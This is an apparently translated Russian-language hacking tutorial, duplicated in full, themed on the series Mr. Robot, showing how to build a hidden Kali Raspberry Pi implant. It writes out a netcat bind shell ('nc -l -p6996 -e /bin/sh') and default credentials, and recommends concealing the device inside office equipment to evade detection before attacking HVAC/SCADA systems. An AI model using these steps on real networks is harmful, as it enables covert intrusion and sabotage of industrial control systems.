Добро пожаловать обратно, мои поклонники Мистера Робота!
Многие из вас писали мне, как им нравится сериал «Мистер Робот» на USA Network и Amazon Prime . Я тоже его большой поклонник! Если вы его ещё не видели, обязательно посмотрите. Возможно, это лучший сериал о хакерах на ТВ.
«Мистер Робот» — история молодого человека с активной общественной позицией (с тяжёлой социальной тревожностью и пагубной зависимостью от морфина), который днём работает в сфере кибербезопасности, защищая сеть «Корпорации Зла», а ночью становится хакером-мстителем (подходит ли этот сценарий кому-нибудь из наших знакомых?). В конце концов, его вербует хакерская организация fsociety (которая внешне и по действиям очень похожа на Anonymous), чтобы уничтожить «Корпорацию Зла».
На мой взгляд, одна из самых интересных частей шоу — реалистичность взломов. Никаких закрученных анимированных вирусов, как во многих других сериалах и фильмах, а вполне добротный старый добрый Linux с командной строкой.
Взлом Raspberry Pi
В 4-м эпизоде ( « eps1.3__da3m0ns.mp4 » ) главный герой Эллиотт планирует использовать Raspberry Pi для управления системой отопления склада, где Evil Corp хранит свои резервные копии на магнитных лентах. Если им удастся поднять температуру в хранилище до нужной температуры, резервные копии на магнитных лентах станут непригодными к использованию.
На этих резервных копиях лент хранятся данные о 70% потребительской задолженности в мире, включая миллиарды долларов студенческих кредитов. Хакеры уверены, что, уничтожив эти данные, они избавят миллионы людей от студенческих кредитов и потребительских долгов, удерживаемых Evil Corp.
В этом уроке я покажу вам, как создать взломанный Raspberry Pi (для тех из вас, кто не знает, Raspberry Pi — это крошечный, недорогой, мощный компьютер размером с кредитную карту), которым можно управлять удаленно, подобно тому, что собирается использовать Эллиотт в сериале «Мистер Робот» в этом эпизоде.
Шаг 1 : Загрузите ARM - версию Kali
Первый шаг, конечно же, — скачать ARM-версию Kali. Raspberry Pi и многие мобильные устройства используют процессоры ARM, поскольку они более энергоэффективны и меньше нагреваются, поэтому операционную систему Kali необходимо скомпилировать специально для них.
К счастью, ребята из Offensive Security уже сделали это за нас. Перейдите на страницу загрузки Offensive Security, чтобы получить файл Raspberry Pi. После загрузки образа распакуйте его с помощью WinRAR, WinZip или любого другого архиватора, умеющего распаковывать файлы.
Шаг 2: Загрузите и установите Win32 Disk Imager
Теперь нам нужно установить Win32 Disk Imager, который можно скачать с SourceForge . Эта утилита позволяет записать образ на SD-карту или USB-накопитель. Рекомендую быструю SD-карту объёмом не менее 4 ГБ. Сейчас можно купить карту объёмом 16 ГБ примерно за 7 долларов.
Шаг 3: Запустите Disk Imager
Теперь, когда вы установили Disk Imager, щелкните по нему правой кнопкой мыши и запустите его от имени «администратора».
Выберите образ Kali в окне «Файл образа», скопируйте его на SD-карту в окне «Устройство» и нажмите кнопку «Записать». Будьте терпеливы, это может занять некоторое время.
Если вы используете Linux, всё немного проще. Не нужно ничего скачивать. Просто используйте команду dd (команда dd, помимо прочего, используется для создания образа диска в цифровой криминалистике). Если образ называется Kali-RPI.img, а SD-карта находится в каталоге /dev/sdc, и мы хотим скопировать данные блоками размером 512 КБ (bs), то нам нужно просто ввести:
kali >dd if =Kali-RPI.img of = /dev/sdc bs=512k
Шаг 4 : Установите SD - карту в Raspberry Pi
Извлеките SD-карту из вашего компьютера, установите её в Raspberry Pi и загрузите его. После загрузки появится командная строка с запросом имени пользователя и пароля. Имя пользователя и пароль по умолчанию:
имя пользователя: kali пароль: kali
Успех! Теперь у вас есть миниатюрный инструмент для взлома Kali, который можно разместить где угодно!
Шаг 5 : Запуск прослушивателя Netcat на Raspberry Pi
Теперь, когда у нас есть Raspberry Pi с Kali, мы можем разместить его где угодно в сети Evil Corporation. Raspberry Pi имеет Ethernet-подключение, и вы можете добавить беспроводной адаптер. Raspberry Pi настолько мал, что его можно спрятать
в самых разных местах. Например, внутри настольного компьютера, телефона, часов и т. д., оставаясь незамеченным.
После подключения мы можем запустить на нем прослушиватель Netcat (Netcat встроен в Kali), введя:
Кали > nc -l -p6996 -e /bin/sh
Это позволит Эллиотту подключаться к терминалу на Raspberry Pi из любой точки мира, используя порт 6996.
Теперь Эллиотт может снова подключиться к Raspberry Pi, используя Netcat в своей системе Kali и введя:
кали > нк 192.168.1.105 6996
Когда он вводит команду ifconfig, он видит, что у него есть терминал на Raspberry Pi, готовый к взлому системы отопления, вентиляции и кондиционирования воздуха Evil Corp! Убедитесь, что вы используете IP-адрес Raspberry Pi в вашей среде.
Конечно, есть и другие способы подключения к Raspberry Pi. Он мог бы использовать SSH, а если нужен графический интерфейс, установить VNC-сервер и подключиться к нему с полным графическим управлением через Kali. Проблема обоих методов в том, что они с большей вероятностью будут обнаружены защитой периметральной сети Evil Corporation.
Одним из инновационных способов подключения было бы превращение беспроводного адаптера в точку доступа Wi-Fi. Таким образом, Эллиот и его друзья могли бы подключаться к сети удалённо или, по крайней мере, к зоне покрытия Wi-Fi с хорошей антенной. Чтобы превратить eRPI в точку доступа, см. моё руководство по созданию точки доступа «Злой двойник» здесь.
Шаг 6: Сеять хаос
Теперь, когда Эллиот внедрил Kali в сеть Evil Corporation, он сможет использовать множество доступных инструментов, чтобы сеять хаос в Evil Corporation в Kali. В 4-м эпизоде он хочет управлять системой отопления, вентиляции и кондиционирования воздуха и увеличить нагрев, чтобы расплавить резервные копии. Теперь, когда Kali интегрирована в сеть Evil Corporation, он сможет это сделать.
Системы HVAC, как и практически все промышленные системы, представляют собой системы SCADA/ICS. В них встроены небольшие ПЛК, управляемые малоизвестными протоколами SCADA/ICS. Подробнее о системах SCADA/ICS см. в разделе «Взлом и безопасность SCADA».
По мере развития шоу и демонстрации новых приемов Эллиотом я постараюсь держать вас в курсе того, как он их выполняет.
Многие из вас писали мне, как им нравится сериал «Мистер Робот» на USA Network и Amazon Prime . Я тоже его большой поклонник! Если вы его ещё не видели, обязательно посмотрите. Возможно, это лучший сериал о хакерах на ТВ.
«Мистер Робот» — история молодого человека с активной общественной позицией (с тяжёлой социальной тревожностью и пагубной зависимостью от морфина), который днём работает в сфере кибербезопасности, защищая сеть «Корпорации Зла», а ночью становится хакером-мстителем (подходит ли этот сценарий кому-нибудь из наших знакомых?). В конце концов, его вербует хакерская организация fsociety (которая внешне и по действиям очень похожа на Anonymous), чтобы уничтожить «Корпорацию Зла».
На мой взгляд, одна из самых интересных частей шоу — реалистичность взломов. Никаких закрученных анимированных вирусов, как во многих других сериалах и фильмах, а вполне добротный старый добрый Linux с командной строкой.
Взлом Raspberry Pi
В 4-м эпизоде ( « eps1.3__da3m0ns.mp4 » ) главный герой Эллиотт планирует использовать Raspberry Pi для управления системой отопления склада, где Evil Corp хранит свои резервные копии на магнитных лентах. Если им удастся поднять температуру в хранилище до нужной температуры, резервные копии на магнитных лентах станут непригодными к использованию.
На этих резервных копиях лент хранятся данные о 70% потребительской задолженности в мире, включая миллиарды долларов студенческих кредитов. Хакеры уверены, что, уничтожив эти данные, они избавят миллионы людей от студенческих кредитов и потребительских долгов, удерживаемых Evil Corp.
В этом уроке я покажу вам, как создать взломанный Raspberry Pi (для тех из вас, кто не знает, Raspberry Pi — это крошечный, недорогой, мощный компьютер размером с кредитную карту), которым можно управлять удаленно, подобно тому, что собирается использовать Эллиотт в сериале «Мистер Робот» в этом эпизоде.
Шаг 1 : Загрузите ARM - версию Kali
Первый шаг, конечно же, — скачать ARM-версию Kali. Raspberry Pi и многие мобильные устройства используют процессоры ARM, поскольку они более энергоэффективны и меньше нагреваются, поэтому операционную систему Kali необходимо скомпилировать специально для них.
К счастью, ребята из Offensive Security уже сделали это за нас. Перейдите на страницу загрузки Offensive Security, чтобы получить файл Raspberry Pi. После загрузки образа распакуйте его с помощью WinRAR, WinZip или любого другого архиватора, умеющего распаковывать файлы.
Шаг 2: Загрузите и установите Win32 Disk Imager
Теперь нам нужно установить Win32 Disk Imager, который можно скачать с SourceForge . Эта утилита позволяет записать образ на SD-карту или USB-накопитель. Рекомендую быструю SD-карту объёмом не менее 4 ГБ. Сейчас можно купить карту объёмом 16 ГБ примерно за 7 долларов.
Шаг 3: Запустите Disk Imager
Теперь, когда вы установили Disk Imager, щелкните по нему правой кнопкой мыши и запустите его от имени «администратора».
Выберите образ Kali в окне «Файл образа», скопируйте его на SD-карту в окне «Устройство» и нажмите кнопку «Записать». Будьте терпеливы, это может занять некоторое время.
Если вы используете Linux, всё немного проще. Не нужно ничего скачивать. Просто используйте команду dd (команда dd, помимо прочего, используется для создания образа диска в цифровой криминалистике). Если образ называется Kali-RPI.img, а SD-карта находится в каталоге /dev/sdc, и мы хотим скопировать данные блоками размером 512 КБ (bs), то нам нужно просто ввести:
kali >dd if =Kali-RPI.img of = /dev/sdc bs=512k
Шаг 4 : Установите SD - карту в Raspberry Pi
Извлеките SD-карту из вашего компьютера, установите её в Raspberry Pi и загрузите его. После загрузки появится командная строка с запросом имени пользователя и пароля. Имя пользователя и пароль по умолчанию:
имя пользователя: kali пароль: kali
Успех! Теперь у вас есть миниатюрный инструмент для взлома Kali, который можно разместить где угодно!
Шаг 5 : Запуск прослушивателя Netcat на Raspberry Pi
Теперь, когда у нас есть Raspberry Pi с Kali, мы можем разместить его где угодно в сети Evil Corporation. Raspberry Pi имеет Ethernet-подключение, и вы можете добавить беспроводной адаптер. Raspberry Pi настолько мал, что его можно спрятать
в самых разных местах. Например, внутри настольного компьютера, телефона, часов и т. д., оставаясь незамеченным.
После подключения мы можем запустить на нем прослушиватель Netcat (Netcat встроен в Kali), введя:
Кали > nc -l -p6996 -e /bin/sh
Это позволит Эллиотту подключаться к терминалу на Raspberry Pi из любой точки мира, используя порт 6996.
Теперь Эллиотт может снова подключиться к Raspberry Pi, используя Netcat в своей системе Kali и введя:
кали > нк 192.168.1.105 6996
Когда он вводит команду ifconfig, он видит, что у него есть терминал на Raspberry Pi, готовый к взлому системы отопления, вентиляции и кондиционирования воздуха Evil Corp! Убедитесь, что вы используете IP-адрес Raspberry Pi в вашей среде.
Конечно, есть и другие способы подключения к Raspberry Pi. Он мог бы использовать SSH, а если нужен графический интерфейс, установить VNC-сервер и подключиться к нему с полным графическим управлением через Kali. Проблема обоих методов в том, что они с большей вероятностью будут обнаружены защитой периметральной сети Evil Corporation.
Одним из инновационных способов подключения было бы превращение беспроводного адаптера в точку доступа Wi-Fi. Таким образом, Эллиот и его друзья могли бы подключаться к сети удалённо или, по крайней мере, к зоне покрытия Wi-Fi с хорошей антенной. Чтобы превратить eRPI в точку доступа, см. моё руководство по созданию точки доступа «Злой двойник» здесь.
Шаг 6: Сеять хаос
Теперь, когда Эллиот внедрил Kali в сеть Evil Corporation, он сможет использовать множество доступных инструментов, чтобы сеять хаос в Evil Corporation в Kali. В 4-м эпизоде он хочет управлять системой отопления, вентиляции и кондиционирования воздуха и увеличить нагрев, чтобы расплавить резервные копии. Теперь, когда Kali интегрирована в сеть Evil Corporation, он сможет это сделать.
Системы HVAC, как и практически все промышленные системы, представляют собой системы SCADA/ICS. В них встроены небольшие ПЛК, управляемые малоизвестными протоколами SCADA/ICS. Подробнее о системах SCADA/ICS см. в разделе «Взлом и безопасность SCADA».
По мере развития шоу и демонстрации новых приемов Эллиотом я постараюсь держать вас в курсе того, как он их выполняет.
